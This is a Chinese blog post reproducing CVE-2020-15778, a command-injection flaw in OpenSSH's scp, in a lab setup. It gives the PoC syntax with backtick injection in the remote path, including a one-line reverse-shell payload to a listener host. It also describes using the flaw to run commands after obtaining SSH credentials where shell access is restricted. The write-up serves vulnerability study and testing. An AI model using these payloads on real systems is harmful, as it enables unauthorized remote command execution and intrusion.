scp命令怎么算执行完毕了_CVE202015778 Openssh命令注入漏洞复现

最新推荐文章于 2022-08-17 10:33:06 发布
最新推荐文章于 2022-08-17 10:33:06 发布
阅读量613 收藏
点赞数
文章标签: scp命令怎么算执行完毕了
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_29533307/article/details/113316751
版权

一、关于SCP:

scp是用于在计算机之间复制文件的程序。它使用SSH协议。在大多数Linux和Unix发行版中默认都包含它。

漏洞标题:OpenSSH 8.3p1中的scp允许进行eval注入

发现人:Chinmay Pandya

产品:Openssh

受影响的组件:SCP

漏洞版本:<= openssh-8.3p1

CVE编号:CVE-2020-15778

根据漏洞发现者的github,指出漏洞出现在此处989行代码,可进行命令注入

1e3b99bd2dca2c76756e02917632d1c9.png

二、漏洞复现:

测试环境:centos7,ssh版本如下:

12f7893bbcba50f27a4a9db8815da2ca.png

1、scp基础用法:

scp test.txt test@192.168.136.133:/tmp/test2.txt

91add87e5a093032a779de71d7b07948.png

命令解析:将test.txt文件上传到192.168.136.133的/tmp 目录下的 test2.txt

但是前提是要知道ssh的密码

c9753f62447e0ff05c6e2cf32453f291.png

2、poc payload:

scp  /sourcefile remoteserver:'`touch /tmp/exploit.sh`/targetfile'

在向远程主机拷贝文件时,文件的路径会追加到本地scp命令后,当执行本地scp命令时,scp不会检查、过滤和清除文件名。这使得攻击者执行带有反引号的有效scp命令时,本地shell还将执行反引号中的命令

SCP支持带有“ -r”选项的目录传输。由于linux允许在文件名中使用反引号(`)。攻击者可以在文件名中创建有效负载,并且当受害者将完整文件夹应对到远程服务器时,该文件名中的有效负载将执行。

利用实例:

scp test.txt test@192.168.136.133:'`touch /tmp/exploit.sh`/tmp/test1.txt'

``是执行的命令

211491e458ac1109bdbfdeef1bccdc7d.png

exploit.sh成功被创建:

93b2b010e64a54928742646ab8d46281.png

3、直接反弹shell:

scp test.txt test@192.168.136.133:'`bash -i >& /dev/tcp/192.168.136.129/7777 0>&1`/tmp/test3.txt'

4e3da36c5864f4b11ff16cc03aa9ca85.png

反弹shell成功:

16fed38a8b4f3b38c1d1a825724ee6aa.png

三、实际环境中的利用方案以及场景:

对于用户来说,ssh被阻止,但authorized_keys文件中的命令选项允许使用scp的情况。您可以绕过此限制并在远程服务器上执行命令。也就是说,实际中通过各种手段获取到了ssh的用户密码,但是不允许ssh连接,或者ip等各种限制,可以尝试此漏洞进行利用

参考链接:

https://github.com/cpandya2909/CVE-2020-15778/

吕桂华
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
OpenSSH 存在输入验证错误漏洞(CVE-2019-16905)修复补丁及命令
01-15
openssh-8.4p1.tar.gz openssl-1.1.1g.tar.gz zlib-1.2.11.tar.gz 操作命令.txt
scp传输错误
阿白,
08-12 557
scp wecenter.tar.gz [email protected]:/web 对于这条命令没意思是将压缩包文件传到/web目录下,对应主机要先建立好/web目录,如果没有,就会被机器理解为串给/下的web文件,因为文件类型不对,会有错误,/web会是乱码 ...
ssh拷贝文件——scp命令
weixin_42156097的博客
11-18 4396
描述 利用ssh,使用scp命令成文件的拷贝 请你确认执行scp命令时,你处在本地端 1. 拷贝远端文件到本地 拷贝文件 scp 远程用户名@远程ip:路径/文件名 本地路径 拷贝文件夹 scp -r 远程用户名@远程ip:路径/文件夹 本地路径 例子 scp [email protected]:/home/1.py /Users/admin/Desktop 问题 终端提示 /Users/admin/Desktop: no such file or directory 排查了一下,发现文件路径没有
Linux系统(五)网卡、IP地址、以及SSH、Vncserver、SCP相关网络操作
小小何先生的学习之旅
08-23 1455
序号 命令 对应英文 作用 01 shutdown 选型 时间 shutdown 关机/重新启动 shutdown shutdown命令可以安全关闭 或者重新启动系统 选项 含义 -r 重新启动 不指定选项和参数,默认表示一分钟之后 关闭电脑 远程维护服务器时,最好不要关闭系统,而应该重新启动系统 # 重新启动操作系统 $ shot
linux之cp/scp命令scp命令详解
大鹏
11-09 1315
名称:cp 使用权限:所有使用者 使用方式: cp [options] source dest cp [options] source... directory 说明:将一个档案拷贝至另一档案,或将数个档案拷贝至另一目录。 把计 -a 尽可能将档案状态、权限等资料都照原状予以复制。 -r 若 source 中含有目录名,则将目录下之档案亦皆依序拷贝至目的地。【遍历】 -f 若目的
Linux scp 远程复制
w13511069150的博客
07-26 635
scp命令 Linux下可以使用scp远程复制,命令如下 scp -P 22222 -r wlx.text [email protected]:/root 参数说明: -P 指定端口 -r 复制目录 wlx.text 要复制的文件 [email protected]:/root 对方用户名 ,IP,位置 按回车后输入密码,然后就直接复制到远程主机上了,这样每次输入密码太麻烦了 sshpass 命令 yum install -y sshpass 安装 sshpass ...
scp命令的使用
橘子
08-17 5575
scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。实例:这里以我本机电脑和虚拟机ubuntu系统为例,进行文件传输,假设我本机电脑win10系统为本地,虚拟机ubuntu系统为远程。第一次传递失败是因为ubuntu的home目录下没有相关权限,赋权就可以了。远程IP:192.168.138.129 用户名tu ssh端口号22。...
scp命令及后台运行
weixin_43589837的博客
02-19 4957
scp[可选参数]file_sourcefile_target 如:scp-r *[email protected]:/test_k --将当前目录下所有的资料scp到999主机的test_k 目录(-r 上传多层目录) ctrl+z //挂起当前任务 jobs //查看任务,返回任务编号n和进程号 bg %n //将编号为n的任务转后台运行 fg %n //将...
Linux scp命令
weixin_45736684的博客
03-27 236
网址1
scp不成功
点点滴滴
04-20 2327
1. 客户机生成公钥 ssh-keygen -t rsa  2. copy公钥到服务器 scp  ~/.ssh/id_rsa.pub   账号@192.168.10.2:~/.ssh/my.pub 3. 导入服务器信任列表 cat ~/.ssh/a.pub >> ~/.ssh/authorized_keys 注意: 1. 我的测试中不要求客户机和服
python执行scp命令拷贝文件及文件夹到远程主机的目录方法
09-19
今天小编就为大家分享一篇python执行scp命令拷贝文件及文件夹到远程主机的目录方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
linux中scp命令scp命令用法大全
01-10
linux之cp/scp命令scp命令详解  名称:cp 使用权限:所有使用者 使用方式: cp [options] source dest cp [options] source… directory 说明:将一个档案拷贝至另一档案,或将数个档案拷贝至另一目录。 把计
bash脚本中将密码传递给ssh/scp命令方法详解
01-20
可以使用以下命令在系统上安装它。 在Debian上: $ sudo apt install sshpass 在CentOS上: $ yum –enablerepo = epel -y install sshpass 使用SSHPASS sshspass使用sshspass环境变量存储用户密码。需要首先...
关于__Federico Milano 的电力系统分析工具箱.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
mlab-upenn 研究小组的心脏模型模拟.zip
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
混合图像创建大师matlab代码.zip
最新发布
04-26
1.版本:matlab2014/2019a/2021a 2.附赠案例数据可直接运行matlab程序。 3.代码特点:参数化编程、参数可方便更改、代码编程思路清晰、注释明细。 4.适用对象:计机,电子信息工程、数学等专业的大学生课程设计、期末大作业和毕业设计。
中序遍历二叉树-java版本
04-26
在Java中,实现二叉树的中序遍历同样可以通过递归来成。中序遍历的顺序是:首先递归地中序遍历左子树,然后访问根节点,最后递归地中序遍历右子树。 在这段代码中,Node类定义了二叉树的节点,BinaryTree类包含一个指向根节点的指针和inOrder方法,用于递归地进行中序遍历。printInOrder方法调用inOrder方法并打印出遍历的结果。 在Main类中,我们创建了一个示例二叉树,并调用printInOrder方法来输出中序遍历的结果。输出应该是:4 2 5 1 3,这表示中序遍历的顺序是左子树(4),然后是根节点(2),接着是右子树的左子树(5),然后是右子树的根节点(1),最后是右子树的右子树(3)。
linux怎么后台执行scp命令
02-08
在Linux中,可以使用以下步骤来后台执行scp命令: 1. 正常执行scp命令。 2. 输入`ctrl + z`暂停任务。 3. 使用`bg`命令将任务放入后台。 4. 使用`disown -h`命令将这个作业忽略HUP信号。 5. 测试会话中断,任务会继续运行不受影响。 以下是一个示例: ```shell # 步骤1:正常执行scp命令 scp -r source_directory user@destination:/path/to/destination # 步骤2:输入ctrl + z暂停任务 # 步骤3:使用bg命令将任务放入后台 bg # 步骤4:使用disown -h命令将这个作业忽略HUP信号 disown -h # 步骤5:测试会话中断,任务会继续运行不受影响 ``` 请注意,这些步骤适用于大多数Linux发行版。但是,具体的命令可能会因发行版和版本而有所不同。请根据您使用的Linux发行版和版本进行相应的调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值